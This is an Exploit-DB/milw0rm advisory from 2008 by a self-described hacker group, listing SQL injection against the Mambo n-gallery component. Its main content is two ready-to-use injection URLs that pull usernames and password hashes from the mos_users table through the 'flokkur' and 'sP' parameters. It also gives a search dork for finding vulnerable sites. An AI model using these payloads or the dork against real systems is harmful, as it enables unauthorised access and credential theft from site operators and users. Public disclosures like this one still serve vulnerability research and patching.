Mambo Component N-Gallery - Multiple SQL Injections

EDB-ID:

5980

CVE:

N/A


Platform:

PHP

Published:

2008-06-30

###########################################
#                                         #
# Mambo Component n-gallery SQL Injection #
#                                         # 
###########################################
#                                         #
##Author : AlbaniaN-[H]                   # 
#                                         #
###Site : http://www.khg-crew.ws          #
#                                         #
####Home Page : http://www.vaalon.org     #
#                                         #
#####Email : valion@khg-crew.ws           #
#                                         #
###########################################
#                                         #
# DORK : allinurl:"com_n-gallery"         #
#                                         #  
###########################################
#                                         #
##############################################################################################################################################################
#            #                                                                                                                                               #
#Exploit 1 : #                                                                                                                                               #
#            #################################################################################################################################################
#                                                                                                                                                            #
# index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--                                              #
#                                                                                                                                                            #
##############################################################################################################################################################
#            #                                                                                                                                               #
#Exploit 2 : #                                                                                                                                               #
#            #################################################################################################################################################
#                                                                                                                                                            #
# index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* #
#                                                                                                                                                            #
##############################################################################################################################################################
#          Kosova Hackers Group           # 
###########################################
#             AlbaniaN-[H]                #
###########################################
#         Republic of Kosova (K)          # 
###########################################
#      Greetings to: urtan,redc00de       # 
###########################################
#    & all Kosova Hackers Group           # 
###########################################
#&all muslim peoples all over the world :)#
###########################################

# milw0rm.com [2008-06-30]